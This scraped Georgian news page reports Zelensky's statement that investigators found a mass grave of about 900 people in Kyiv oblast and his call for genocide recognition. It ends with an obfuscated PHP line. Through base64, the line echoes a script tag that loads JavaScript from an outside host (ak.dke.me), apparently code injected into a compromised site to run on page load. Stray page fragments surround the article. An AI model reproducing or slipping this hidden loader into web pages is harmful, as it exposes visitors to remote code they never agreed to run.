tube
ავერსი jaluzi
უკრაინის პრეზიდენტის ვოლოდიმირ ზელენსკის განცხადებით, სამართალდამცველებმა კიევის ოლქში 900-მდე ადამიანის მასობრივი საფლავი აღმოაჩინეს.
 
„რუსები კვალს ასუფთავებენ. იმდენი მოკლული იყო, რომ, გვამების განადგურების მიუხედავად, ახლა ისევ იპოვეს 900 ადამიანის საფლავი კიევის ოლქში. სულ რამდენი ადამიანი დაიღუპა არავინ იცის. იქნება შედეგები, იქნება გამოძიება, მოგვიანებით ჩატარდება მოსახლეობის აღწერა, ყველა ადამიანი უნდა მოვძებნოთ. ჩვენი საგამოძიებო და სამართალდამცავი ორგანოები იპოვიან ყველას, მაგრამ ჩვენთვის მნიშვნელოვანი გენოციდის საერთაშორისო აღიარებაა“, - განაცხადა ზელენსკიმ. 
 
ინფორმაციისთვის, კიევის და მის ირგვლივ ქალაქების ოკუპანტებისგან გათავისუფლების შემდეგ, უკრაინელები თითქმის ყოველ დღე  პოულობენ მასობრივ საფლავებს . 
803
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");